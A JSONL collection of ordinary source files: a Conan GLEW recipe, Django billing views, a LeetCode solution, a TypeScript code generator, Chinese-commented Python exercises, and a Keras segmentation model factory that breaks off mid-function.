+{"seq_id":"510323619","text":"from conans import python_requires, tools, CMake\npyreq = python_requires(\"pyreq/1.0.0@tdelame/stable\")\n\n\nclass GLEW(pyreq.CMakeConanFile):\n description = \"OpenGL Extension Wrangler Library\"\n url = \"https://glew.sourceforge.net/\"\n version = \"2.1.0\"\n name = \"GLEW\"\n license = \"MIT\"\n\n settings = \"os\", \"build_type\"\n\n def config_options(self):\n \"\"\"Executed before the actual assignment of options. Use it to configure or constrain\n the available options in a package. You can read values of self.settings but you cannot\n read values of self.options.\"\"\"\n if self.settings.os != \"Linux\":\n raise RuntimeError(\"Your OS has not been tested for this recipe. Please, extend the recipe.\")\n\n def requirements(self):\n \"\"\"Define runtime requirements.\"\"\"\n self.requires(\"GLU/9.0.0@tdelame/stable\")\n\n def source(self):\n \"\"\"Retrieve source code.\"\"\"\n self.download(\n \"https://github.com/nigels-com/glew/releases/download/glew-{0}\".format(self.version),\n directory=\"glew-{}\".format(self.version), compression=\"tgz\")\n\n def cmake_definitions(self):\n definition_dict = {\n \"BUILD_UTILS\": False,\n \"GLEW_REGAL\": False,\n \"GLEW_OSMESA\": False,\n }\n self.add_default_definitions(definition_dict)\n return definition_dict\n\n def configure_cmake(self):\n \"\"\"Configure and return a CMake build helper.\"\"\"\n cmake = CMake(self, generator=\"Ninja\")\n cmake.configure(\n defs=self.cmake_definitions(),\n source_folder=\"{}/build/cmake\".format(self._source_subfolder),\n build_folder=self._build_subfolder)\n return cmake\n\n def package(self):\n \"\"\"Assemble the package.\"\"\"\n self.copy(\"include/*\", \".\", \"%s\" % self._source_subfolder, keep_path=True)\n self.copy(\"%s/license*\" % self._source_subfolder, dst=\"licenses\", ignore_case=True, keep_path=False)\n self.copy(pattern=\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n\n if self.options.shared:\n self.copy(pattern=\"*.so\", dst=\"lib\", keep_path=False)\n self.copy(pattern=\"*.so.*\", dst=\"lib\", keep_path=False)\n else:\n self.copy(pattern=\"*.a\", dst=\"lib\", keep_path=False)\n\n def package_info(self):\n super(GLEW, self).package_info()\n self.cpp_info.libs = ['GLEW']\n self.cpp_info.libs.append(\"GL\")\n if self.settings.build_type == \"Debug\":\n self.cpp_info.libs[0] += \"d\"\n","sub_path":"GLEW/GLEW-2.1.0.py","file_name":"GLEW-2.1.0.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"196434442","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom member.models import Member, Bill, Lot, BillCtl, History\nfrom django.db.models import Count\nfrom .forms import MemberForm, BillForm\nfrom django.core.files.storage import FileSystemStorage\nfrom django.template.loader import render_to_string\nfrom django.utils._os import safe_join\nfrom reportlab.pdfgen import canvas\nfrom decimal import *\nfrom member import report\nfrom member.printing import MyPrint\nfrom io import BytesIO\n\nimport pdb, weasyprint\n\nresFee = 50\n\ndef member_search(request):\n return render(request, 'member_search.html')\n\ndef member_detail(request, pk):\n members = get_object_or_404(Member, pk=pk)\n # members = Member.objects.all()\n return render(request, 'member_detail.html', {'members': members})\n\ndef lot_list(request):\n lotc = Lot.objects.annotate(num_lots=Count('mem'))\n return render(request, 'member_list.html', {'jack': lotc})\n\ndef search(request):\n if 'q' in request.GET and request.GET['q']:\n q = request.GET['q']\n members = Member.objects.filter(last__icontains= q)\n return render(request, 'search_results.html', {'members': members, 'query': q})\n else:\n message = 'Please submit a search term.'\n return HttpResponse(message)\n# -------------------------------------------New Member\ndef member_new(request):\n if request.method == \"POST\":\n form = MemberForm(request.POST)\n if form.is_valid():\n post = form.save()\n post.save()\n\n else:\n form = MemberForm()\n return render(request, 'post_edit.html', {'form' : form})\n\n\ndef member_bill(request, pk):\n bdetail = get_object_or_404(Member, pk=pk)\n glot = Lot.objects.filter(mem = str(pk))\n gbal = History.objects.filter(mid = str(pk)).filter(year__icontains=2015)\n return render(request, 'bill_detail.html', {'bdetail': bdetail, 'glot': glot, 'gbal': gbal})\n\n\n\n#-----------------------------------------------------------------Member Billing\n\n\n\n\n\ndef checkBillrec(dt, xbdet, xbctl):\n billrec = Bill.objects.filter(mem__exact=xbdet.id).filter(bill_year__exact=dt)\n for xbill in billrec:\n# pdb.set_trace()\n if xbill.bill_flag == 'N':\n billr = Bill.objects.get(id=xbill.id)\n billr.bill_flag = 'R'\n billr.save()\n if xbill.bill_flag == \"Y\":\n return\n gbal = History.objects.filter(mid=xbdet.id).filter(year__exact=(dt - 1))\n pastbal = 0\n for xgbal in gbal:\n pastbal = xgbal.bal\n if 'R' in xbdet.flag:\n res_wk = xbctl.res_fee\n else:\n res_wk = 0\n glot = Lot.objects.filter(mem__exact=xbdet.id)\n len_glot = 0\n ctxyz = 0\n for xyz in glot:\n len_glot = len_glot + 1\n if xyz.mow == 'Y':\n ctxyz = ctxyz + 1\n tot_bill = (pastbal + xbctl.dues + res_wk + (len_glot * xbctl.lot_maint) +\n (ctxyz * xbctl.mow_fee) + round((pastbal * xbctl.pdue_percent),0))\n rwrt = Bill(mem=xbdet.id, bill_year = dt, bill_date = xbctl.billdate, dues_amt = xbctl.dues,\n bal_amt = pastbal, pdue_amt = round((pastbal * xbctl.pdue_percent),0), res_amt = res_wk,\n lots_amt = (len_glot * xbctl.lot_maint), mow_amt = (ctxyz * xbctl.mow_fee),\n tot_amt = tot_bill, lots = len_glot, mow = ctxyz, bill_flag = 'Y', print_flag = 'N')\n rwrt.save()\n return\n\ndef memberBilling(dt, xbctl):\n bdetail = Member.objects.all()\n for xbdet in bdetail:\n if \"A\" in xbdet.flag:\n checkBillrec(dt, xbdet, xbctl)\n return\n\n\ndef checkBillCtl(request, dte):\n dt = int(dte)\n try:\n bctl = BillCtl.objects.filter(year__exact=dt)\n except:\n return HttpResponseNotFound('

Bill Control Record Not Found

')\n for xbctl in bctl:\n memberBilling(dt, xbctl)\n return HttpResponse(\"Billing Complete\")\n\ndef memberBillCtl(request, dte):\n try:\n form = BillCtl.objects.filter(year__exact=dte)\n\n except:\n\n if request.method == \"POST\":\n form = BillForm(request.POST)\n if form.is_valid():\n post = form.save()\n post.save()\n\n else:\n form = BillForm()\n\n return render(request, 'post_edit.html', {'form' : form})\n\n\n# -----------------------------------------------------------------------Print Member Bills\n\n\ndef printBillCtl(request, dte):\n dt = int(dte)\n try:\n bctl = BillCtl.objects.filter(year__exact=dt)\n except:\n return HttpResponseNotFound('

Bill Control Record Not Found

')\n for xctl in bctl:\n invdatestr = str(xctl.billdate)\n invdate = invdatestr[5:7] + '/' + invdatestr[8:10] + '/' + invdatestr[0:4]\n duedatestr = str(xctl.billduedate)\n duedate = duedatestr[5:7] + '/' + duedatestr[8:10] + '/' + duedatestr[0:4]\n\n\n colBill = []\n try:\n pbill = Bill.objects.filter(bill_year__exact=xctl.year).filter(bill_flag__exact='Y').filter(print_flag__exact='N')\n except:\n return HttpResponse('Nothing to Print')\n for xz in pbill:\n x_colBill = []\n try:\n membill = Member.objects.get(id=xz.mem)\n\n x_colBill.append(str(xz.id))\n x_colBill.append(str(xz.mem))\n\n x_colBill.append(membill.set_memberfullName())\n x_colBill.append(membill.other)\n x_colBill.append(membill.street)\n x_colBill.append(membill.set_memberCitySt())\n\n except:\n return HttpResponse('Missing member for Bill record #')\n memlots = Lot.objects.filter(mem__exact = xz.mem)\n first = True\n xlot = ''\n for xy in memlots:\n if first == False:\n xlot = xlot + (', ')\n else:\n first = False\n xlot = xlot + xy.lid\n x_colBill.append(xlot)\n x_colBill.append(xz.dues_amt)\n x_colBill.append(xz.bal_amt)\n x_colBill.append(xz.res_amt)\n x_colBill.append(xz.lots_amt)\n x_colBill.append(xz.mow_amt)\n x_colBill.append(xz.pdue_amt)\n x_colBill.append(xz.tot_amt)\n x_colBill.append(xz.lots)\n x_colBill.append(xz.mow)\n x_colBill.append(xz.dues_amt + xz.res_amt + xz.lots_amt + xz.mow_amt)\n colBill.append(x_colBill)\n # return render(request, 'print_bill.html', {'colBill': colBill, 'invdate': invdate, 'duedate': duedate})\n # html_string = render_to_string('print_bill.html', {'colBill': colBill, 'invdate': invdate})\n html_string = render_to_string('print_bill.html', {'colBill': colBill, 'invdate': invdate, 'duedate': duedate})\n # return render(request, 'print_bill.html', {'colBill': colBill, 'invdate': invdate})\n\n html = weasyprint.HTML(string=html_string, base_url=request.build_absolute_uri())\n\n html.write_pdf(target='/tmp/mypdf.pdf');\n\n fs = FileSystemStorage('/tmp')\n with fs.open('mypdf.pdf') as pdf:\n response = HttpResponse(pdf, content_type='application/pdf')\n response['Content-Disposition'] = 'attachment; filename=\"mypdf.pdf\"'\n return response\n return response\n pdb.set_trace()\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = 'attachment; filename=\"Bills.pdf\"'\n\n buffer = BytesIO()\n\n report = MyPrint(buffer, 'Letter')\n pdf = report.callprt_bills(pbill)\n\n response.write(pbill)\n\n return HttpResponse(\"Billing Complete\")\n\ndef my_fetcher(url):\n pdb.set_trace()\n if url.startswith('/static/'):\n url = url[len('/static/'):]\n url = \"file://\" + '/home/tracy/sund2/member/static/Letterhead2.jpg'\n pdb.set_trace()\n return weasyprint.default_url_fetcher(url)\n\n\ndef html_to_pdf_view(request, year, month, day):\n\n members = Member.objects.all()\n\n\n html_string = render_to_string('print_bill.html', {'colBill': colBill, 'invdate': invdate})\n return render(request,'print_bill.html', {'members': members})\n\n html = weasyprint.HTML(string=html_string, base_url=request.build_absolute_uri())\n\n html.write_pdf(target='/tmp/mypdf.pdf');\n\n fs = FileSystemStorage('/tmp')\n with fs.open('mypdf.pdf') as pdf:\n response = HttpResponse(pdf, content_type='application/pdf')\n response['Content-Disposition'] = 'attachment; filename=\"mypdf.pdf\"'\n return response\n return response\n\n\ndef print_users(request):\n\n\n # Create the HttpResponse object with the appropriate PDF headers.\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = 'attachment; filename=\"My Users.pdf\"'\n\n buffer = BytesIO()\n\n report = MyPrint(buffer, 'Letter')\n\n pdf = report.print_users()\n\n response.write(pdf)\n return response\n","sub_path":"member/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"331196096","text":"class Solution:\n def search(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: bool\n \"\"\"\n\n lo = 0\n hi = len(nums) - 1\n while lo <= hi:\n mid = int(lo + hi) // 2\n if nums[mid] == target:\n return True\n # If we know for sure right side is sorted or left side is unsorted\n if nums[mid] < nums[hi] or nums[mid] < nums[lo]:\n if nums[mid] < target <= nums[hi]:\n lo = mid +1\n else:\n hi = mid -1\n # If we know for sure right side is sorted or left side is unsorted\n elif nums[mid] > nums[lo] or nums[mid] > nums[hi]:\n if target < nums[mid] and target >= nums[lo]:\n hi = mid - 1\n else:\n lo = mid +1\n else:\n hi -=1\n return False\n\nif __name__==\"__main__\":\n sol = Solution()\n print(sol.search([1,2,1], 0))\n print(sol.search([2, 5, 6, 0, 0, 1, 2], 0))\n print(sol.search([2, 5, 6, 0, 0, 1, 2], 3))\n","sub_path":"lc_1-100/lc_81.py","file_name":"lc_81.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"287997320","text":"# -----------------------------------------------------------------------------\n# Copyright (c) 2019, Minor Gordon\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND\n# CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\n# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY\n# OF SUCH DAMAGE.\n# -----------------------------------------------------------------------------\n\nimport os.path\n\nfrom thryft.generator.document import Document\nfrom thryft.generators.ts._ts_named_construct import _TsNamedConstruct\nfrom thryft.util import decamelize\n\n\nclass TsDocument(Document, _TsNamedConstruct):\n def _save_to_dir(self, out_dir_path, **kwds):\n self._parent_generator().ts_out_dir_path = out_dir_path\n return self._save_to_file(out_file_path=self.ts_path(), **kwds)\n\n def _save_to_file(self, out_file_path, **kwds):\n if self._parent_generator().ts_out_dir_path is None:\n self._parent_generator().ts_out_dir_path = os.path.dirname(out_file_path)\n self.__ts_path = out_file_path\n assert out_file_path == self.ts_path(), \"%s vs. %s\" % (\n out_file_path, self.ts_path())\n return self._save_to_file_helper(repr_method=self.ts_repr, out_file_path=out_file_path, **kwds)\n\n def ts_path(self, file_name=None):\n try:\n return self.__ts_path\n except AttributeError:\n pass\n\n if file_name is None:\n if len(self.definitions) > 0:\n file_name = decamelize(self.definitions[0].ts_name())\n else:\n file_name = self.name\n ts_out_dir_path = self._parent_generator().ts_out_dir_path\n assert ts_out_dir_path is not None\n ts_path = \\\n os.path.join(\n ts_out_dir_path,\n self.namespace_by_scope(\n ('ts', '*')).name.replace('.', os.path.sep),\n file_name + '.ts'\n )\n return ts_path\n\n def _ts_imports_definition(self, **kwds):\n imports = []\n for definition in self.definitions:\n imports.extend(definition.ts_imports_definition(**kwds))\n return imports\n\n def ts_repr(self):\n definitions = \\\n \"\\n\\n\".join(definition.ts_repr()\n for definition in self.definitions)\n if len(definitions) == 0:\n return ''\n\n sections = []\n imports = \"\\n\".join(\n sorted(list(set(self.ts_imports_definition(self.ts_path())))))\n if len(imports) > 0:\n sections.append(imports)\n sections.append(definitions)\n return \"\\n\\n\".join(sections) + \"\\n\"\n","sub_path":"compiler/src/thryft/generators/ts/ts_document.py","file_name":"ts_document.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425098208","text":"# 打印一个边长为n的正方形\nn = 5\nprint('*'*n)\nfor i in ('*'*(n-2)):\n print('*'+' '*(n-2)+'*')\nprint('*'*n)\n\nn = 6\ne = -n//2\nfor i in range(e,n+e):\n if i == e or i == n+e-1:\n print('*'*n)\n else:\n print('*'+' '*(n-2)+'*')\n\nn = 5\nfor i in range(5):\n if i == 0 or i == n-1:\n print('*'*n)\n else:\n print('*'+' '*(n-2)+'*')\n\n# 求100以内所有奇数之和\nsum = 0\nfor i in range(1,100,2):\n sum += i\nprint(sum)\n\n# 求1到5的阶乘之和\nn = 5\nsum = 0\nfor i in range(1,n+1):\n tmp = 1\n for j in range(1,i+1):\n tmp *= j\n sum += tmp\nprint(sum)\n\nnums = 1\nsum = 0\nfor n in range(1,6):\n nums *= n\n sum += nums\nprint(sum)\n\n# 给一个半径,求圆的面积和周长。圆周率3.14\nr = int(input('r='))\nprint('area='+str(3.14*r*r))\nprint('circumference='+str(2*3.14*r))\n\n# 输入两个数,比较大小后,从小到大升序打印\na = input('first:')\nb = input('second:')\nif a > b:\n print(b,a)\nelse:\n print(a,b)\n\nprint(b,a) if a>b else print(a,b)\n# 三目运算\n\n# 获取最大值\nm = int(input('Input first number >>>'))\nwhile True:\n c = input('Input a number >>>')\n if c:\n n = int(c)\n if n > m:\n m = n\n print('Max is',m)\n else:\n break\n\n# 输入n个数,求每次输入后的算数平均数\nn = 0\nsum = 0\nwhile True:\n i = input('>>>')\n if i == 'quit':\n break\n n += 1\n sum += int(i)\n avg = sum/n\n print(avg)\n\n# 九九乘法表\nfor i in range(1,10):\n for j in range(1,10):\n if j <= i:\n print('{}*{}={}'.format(i,j,i*j),end=' ')\n print(\" \")\n\nfor i in range(1,10):\n for j in range(i,10):\n print('{}*{}={}\\t'.format(i,j,i*j),end=' ')\n print(\"\")\n\nfor i in range(1,10):\n for k in range(1,i):\n print(end=\"\\t \")\n for j in range(i,10):\n print('{}*{}={}\\t'.format(i,j,i*j),end=' ')\n print(\" \")\n\nfor i in range(1,10):\n for k in range(1,10-i):\n print(end=\"\\t \")\n for j in range(1,i+1):\n print(\"{}*{}={}\".format(j,i,i*j),end=\"\\t \") \n # \\t放在end=\"\"中好像更容易理解\n# print(\"{}*{}={}\\t\".format(i,j,i*j),end=\" \")\n print(\"\")\n\n# 打印100以内的斐波那契数列及打印第101项\n# 费波那契数列由0和1开始,之后的费波那契系数就是由之前的两数相加而得出。首几个费波那契系数是:\n# 0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233……(OEIS中的数列A000045)\n# 特别指出:0不是第一项,而是第零项。\na = 0\nb = 1\nprint(a,end=\",\")\nprint(b,end=\",\")\nfor i in range(1,100):\n c = a + b\n if c > 100:\n break\n print(c,end=\",\")\n# a = b\n# b = c\n a,b = b,c\n # 这一句相当于a = b和b = c两句\n\n# 打印101项斐波那契数\na = 0\nb = 1\n# 手动打印前两项\nprint('{},{}'.format(0, a))\nprint('{},{}'.format(1, b))\nindex = 1\nwhile True:\n c = a + b\n a = b\n b = c\n index += 1\n print('{},{}'.format(index, c))\n # 这里的index就是显示中前面的序号\n if index == 101:\n break\n\n# 打印第101项斐波那契数\na = 0\nb = 1\n# print('{},{}'.format(0,a))\n# print('{},{}'.format(1,b))\nindex = 1\nwhile True:\n c = a + b\n a,b = b,c\n index += 1\n if index == 101:\n print('{},{}'.format(index,c))\n break\n\na = 0\nb = 1\nfor i in range(1,101):\n c = a + b\n a,b = b,c\n if i < 100:\n continue\n print(c)\n\n# 求素数\nn = int(input(\"Please input a prime number >>>\"))\nflag = False\nfor i in range(2,n):\n if n % i == 0:\n flag = True\n print(i)\n break\nif flag:\n print(n,'is not a prime number.')\nelse:\n print(n,'is a prime number.')\n\nn = int(input(\"Please input a prime number >>>\"))\nfor i in range(2,int(n**0.5)):\n if n % i == 0:\n print(n,'is not a prime number.')\n break\nelse:\n print(n,'is a prime number.')\n\n# 求10万内的所有素数\n# 质数(Prime number),又称素数,指在大于1的自然数中,除了1和该数自身外,无法被其他自然数整除的数(也可定义为只有1与该数本身两个正因数的数)。\n# 大于1的自然数若不是素数,则称之为合数(也称为合成数)。\n# 算术基本定理确立了素数于数论里的核心地位:任何大于1的整数均可被表示成一串唯一素数之乘积。\n# 为了确保该定理的唯一性,1被定义为不是素数,因为在因式分解中可以有任意多个1(如3、1×3、1×1×3等都是3的有效约数分解)。\nimport time\nt = [2] # 素数从2开始\nt0 = time.time()\ncount = 1\nfor x in range(3,100001,2):\n if x > 5 and x % 10 == 5:\n continue\n for i in range(3, int(x ** 0.5) + 1, 2):\n if x % i == 0:\n break\n else:\n count += 1\n t.append(x)\nprint(t)\nprint('花费时间:{}'.format(time.time() - t0))\nprint('质数个数:{}'.format(count))\nprint('质数个数:{}'.format(len(t)))\n\n# 打印菱形\nfor i in range(-3,4):\n if i < 0:\n prespace = -i\n else:\n prespace = i\n print(' '*prespace + '*'*(7-prespace*2))\n\nfor i in range(-3,4):\n prespace=-i if i<0 else i\n # 三目运算符方法。这里不能写成prespace=-i if (i < 0) else prespace=i,这样会报语法错误。\n print(' '*prespace+'*'*(7-prespace*2)) \n\n# 打印对顶三角形\nn = 7\ne = n//2\nfor i in range(-e,n-e):\n prespace = -i if i<0 else i\n print(' '*(e-prespace)+'*'*(2*prespace+1))\n\n# 打印闪电\nfor i in range(-3,4):\n if i < 0:\n print(' '*(-i)+'*'*(4+i))\n elif i > 0:\n print(' '*3+'*'*(4-i))\n else:\n print('*'*7)\n\nj = '*'\nfor i in range(-3,4):\n if i == 0:\n print(j*7)\n print(' '*(-i)+j*(i+4)) if i < 0 else print(3*\" \"+j*(3-i))\n\n# 猴子第一天摘下若干个桃子,当即吃了一半,还不过瘾,又多吃了一个。第二天早上又将剩下的桃子吃掉一半,又多吃了一个。以后每天早上都吃了前一天剩下的一半零一个。到了第10天早上想吃时,只剩下一个桃子了。求第一天共摘了多少个桃子。\n# 猴子应该第九天吃完时就已经知道只剩下一个桃子了。\nn = 1\nfor _ in range(1,10):\n n = (n+1)*2\n print(n)\n\n# 改造,如果知道桃子的总量,算每天吃掉的数量\nn = int(input(\">>>\"))\ncount = 0\nwhile True:\n n = n/2-1\n if n <= 1:\n break\n print(n)\n count +=1\nprint('count:',count)\n\n\n# 杨辉三角\n# 方法一.\n# 思路,首先把杨辉三角的前两行先放入大的列表中,之后从列表的第三个元素开始循环,先加入一个开头的1,\n# 就是cur = [1],再添加中间的部分,用pre是要计算的列表元素的上一个元素,也就是triangle列表中的哪个小的列表。\n# for j in循环来添加中间的部分。最后再加上尾部的1,这样就凑出了杨辉三角的一行,把这一行追加到整个列表中,\n# 整个列表就是杨辉三角\ntriangle=[[1],[1,1]]\nfor i in range(2,6):\n cur = [1]\n pre = triangle[i-1]\n for j in range(len(pre)-1):\n cur.append(pre[j]+pre[j+1])\n cur.append(1)\n triangle.append(cur)\nprint(triangle)\n\n# 先定义一个杨辉三角的空列表,下面进行循环,将计算出的row小列表追加到这个大的列表中。这里需要注意的是,当\n# row列表追加到triangle列表中后,还可以再向这个row小列表中追加数据\ntriangle=[]\nn = 4\nfor i in range(n):\n row = [1]\n triangle.append(row)\n if i == 0: # i是0的时候从这里重新进入循环\n continue\n for j in range(i-1): # i是2时才会进入这里\n row.append(triangle[i-1][j]+triangle[i-1][j+1])\n row.append(1) # i是1时会直接跳转到这里追加1,不会执行上面的循环\nprint(triangle)\n\n# 方法二,while\n# 思路,通过多个小的列表呈现杨辉三角,每个列表打印后换行。先打印出第一行的[1],之后从第二行开始计算,先把前\n# 一行的数据复制到oldline,如第一次计算第二行时,就先把newline中的[1]复制给oldline,之后清空newline,\n# 再计算后面的部分,用offset与i来控制。\nn = 6\noldline = []\nnewline = [1]\n# length = 0\nprint(newline)\nfor i in range(1,n):\n oldline = newline.copy()\n oldline.append(0)\n newline.clear()\n offset = 0\n while offset <= i:\n newline.append(oldline[offset - 1]+oldline[offset])\n offset += 1\n print(newline)\n\nn = 6\noldline = []\nnewline = [1]\nprint(newline)\nfor i in range(1,n):\n oldline = newline.copy()\n oldline.append(0)\n newline.clear()\n offset = 0\n for j in range(i+1):\n newline.append(oldline[j-1]+oldline[j])\n print(newline)\n\ntriangle = []\nn = 6\nfor i in range(n):\n row = [1]\n for k in range(i):\n row.append(1) if k == i-1 else row.append(0)\n triangle.append(row)\n if i == 0:\n continue\n for j in range(1,i//2+1):\n val = triangle[i-1][j-1] + triangle[i-1][j]\n row[j] = val\n if i != 2*j:\n row[-j-1] = val\nprint(triangle)\n\ntriangle = []\nn = 6\nfor i in range(n):\n row = [1] * (i+1) # i是2时,这里就是[1,1,1]\n triangle.append(row) # 把[1,1,1]追加到triangle列表中\n for j in range(1,i//2+1): # i是2时,这里的j只能是1\n val = triangle[i-1][j-1] + triangle[i-1][j] \n # i是2,triangle[1][0] + triangle[1][1],也就是[1,1]中的两个1相加就是val,再修改row[1]的值\n # 也就是[1,1,1]中,中间那个1改成了2\n # 当i是3时,这里还是循环一次,row是[1,1,1,1],j是1,\n row[j] = val\n if i != 2*j:\n row[-j-1] = val\nprint(triangle)\n","sub_path":"20191022Python基础练习.py","file_name":"20191022Python基础练习.py","file_ext":"py","file_size_in_byte":9593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"315317068","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModule that acts as a factory to create segmentation models with a common\ninterface, regardless of the underlying implementation.\n\nMany models are supported by using the segmentation model zoo:\nhttps://github.com/qubvel/segmentation_models\n\n\n@author: Pieter Roggemans\n\"\"\"\n\nimport logging\nimport keras as kr\n\n#-------------------------------------------------------------\n# First define/init some general variables/constants\n#-------------------------------------------------------------\n# Get a logger...\nlogger = logging.getLogger(__name__)\n#logger.setLevel(logging.INFO)\n\n#-------------------------------------------------------------\n# The real work\n#-------------------------------------------------------------\n\n'''\npreprocessing_fn = get_preprocessing('resnet34')\nx = preprocessing_fn(x)\n'''\n\ndef get_model(segmentation_model: str = 'linknet',\n backbone_name: str = 'inceptionresnetv2',\n input_width: int = None,\n input_height: int = None,\n n_channels: int = 3,\n n_classes: int = 1,\n init_weights_with: str = 'imagenet'):\n\n if segmentation_model.lower() == 'deeplabv3plus':\n import model_deeplabv3plus as m\n return m.get_model(input_width=input_width, input_height=input_height,\n n_channels=n_channels, n_classes=n_classes,\n init_model_weights=init_weights_with)\n elif segmentation_model.lower() == 'unet':\n # These two unet variants are implemented in a seperate module\n if backbone_name.lower() == 'standard':\n import model_unet_standard as m\n if init_weights_with:\n init_weights = True\n return m.get_model(input_width=input_width, input_height=input_height,\n n_channels=n_channels, n_classes=n_classes,\n init_model_weights=init_weights)\n elif backbone_name.lower() == 'ternaus':\n import model_unet_ternaus as m\n if init_weights_with:\n init_weights = True\n return m.get_model(input_width=input_width, input_height=input_height,\n n_channels=n_channels, n_classes=n_classes,\n init_model_weights=init_weights)\n\n # Some other unet variants is implemented using the segmentation_models library\n from segmentation_models import Unet\n #from segmentation_models.backbones import get_preprocessing\n\n model = Unet(backbone_name=backbone_name,\n input_shape=(input_width, input_height, n_channels),\n classes=n_classes,\n encoder_weights=init_weights_with)\n return model\n elif segmentation_model.lower() == 'pspnet':\n from segmentation_models import PSPNet\n #from segmentation_models.backbones import get_preprocessing\n\n model = PSPNet(backbone_name=backbone_name,\n input_shape=(input_width, input_height, n_channels),\n classes=n_classes,\n encoder_weights=init_weights_with)\n return model\n elif segmentation_model.lower() == 'linknet':\n from segmentation_models import Linknet\n #from segmentation_models.backbones import get_preprocessing\n\n # First check if input size is compatible with linknet \n check_image_size(segmentation_model, input_width, input_height)\n \n model = Linknet(backbone_name=backbone_name,\n input_shape=(input_width, input_height, n_channels),\n classes=n_classes,\n encoder_weights=init_weights_with)\n return model\n else:\n raise Exception(f\"Unknown segmentation_model: {segmentation_model}\")\n\ndef compile_model(model,\n optimizer,\n loss_mode='binary_crossentropy',\n metrics=None):\n\n if loss_mode == \"bcedice\":\n loss_func = dice_coef_loss_bce\n elif loss_mode == \"binary_crossentropy\":\n loss_func = \"binary_crossentropy\"\n else:\n raise Exception(f\"Unknown loss function: {loss_mode}\")\n\n # TODO: implement option to specify metrics...\n model.compile(optimizer=optimizer, loss=loss_func,\n metrics=[jaccard_coef, jaccard_coef_flat,\n jaccard_coef_int, dice_coef, 'accuracy', 'binary_accuracy'])\n\n return model\n\ndef load_model(model_to_use_filepath: str):\n model = kr.models.load_model(model_to_use_filepath,\n custom_objects={'jaccard_coef': jaccard_coef,\n 'jaccard_coef_flat': jaccard_coef_flat,\n 'jaccard_coef_int': jaccard_coef_int,\n 'dice_coef': dice_coef})\n\n return model\n\ndef check_image_size(segmentation_model: str,\n input_width: int, \n input_height: int):\n if segmentation_model.lower() == 'linknet':\n if((input_width and (input_width % 16) != 0) \n or (input_height and (input_height % 16) != 0)):\n message = f\"STOP: input_width ({input_width} and input_height ({input_height}) should be divisable by 16!\"\n logger.error(message)\n raise Exception(message)\n else:\n logger.info(\"check_image_size is not implemented for this model!\")\n \n#------------------------------------------\n# Loss functions\n#------------------------------------------\n\ndef dice_coef_loss(y_true, y_pred):\n return 1 - dice_coef(y_true, y_pred)\n\ndef bootstrapped_crossentropy(y_true, y_pred, bootstrap_type='hard', alpha=0.95):\n target_tensor = y_true\n prediction_tensor = y_pred\n _epsilon = kr.backend.tensorflow_backend._to_tensor(kr.backend.epsilon(), prediction_tensor.dtype.base_dtype)\n prediction_tensor = kr.backend.tf.clip_by_value(prediction_tensor, _epsilon, 1 - _epsilon)\n prediction_tensor = kr.backend.tf.log(prediction_tensor / (1 - prediction_tensor))\n\n if bootstrap_type == 'soft':\n bootstrap_target_tensor = alpha * target_tensor + (1.0 - alpha) * kr.backend.tf.sigmoid(prediction_tensor)\n else:\n bootstrap_target_tensor = alpha * target_tensor + (1.0 - alpha) * kr.backend.tf.cast(\n kr.backend.tf.sigmoid(prediction_tensor) > 0.5, kr.backend.tf.float32)\n return kr.backend.mean(kr.backend.tf.nn.sigmoid_cross_entropy_with_logits(\n labels=bootstrap_target_tensor, logits=prediction_tensor))\n\ndef dice_coef_loss_bce(y_true, y_pred):\n dice = 0.5\n bce = 0.5\n bootstrapping = 'hard'\n alpha = 1.\n return bootstrapped_crossentropy(y_true, y_pred, bootstrapping, alpha) * bce + dice_coef_loss(y_true, y_pred) * dice\n\n#------------------------------------------\n# Metrics functions\n#------------------------------------------\n\nSMOOTH_LOSS = 1e-12\n\ndef jaccard_coef(y_true, y_pred):\n intersection = kr.backend.sum(y_true * y_pred, axis=[0, -1, -2])\n sum_ = kr.backend.sum(y_true + y_pred, axis=[0, -1, -2])\n\n jac = (intersection + SMOOTH_LOSS) / (sum_ - intersection + 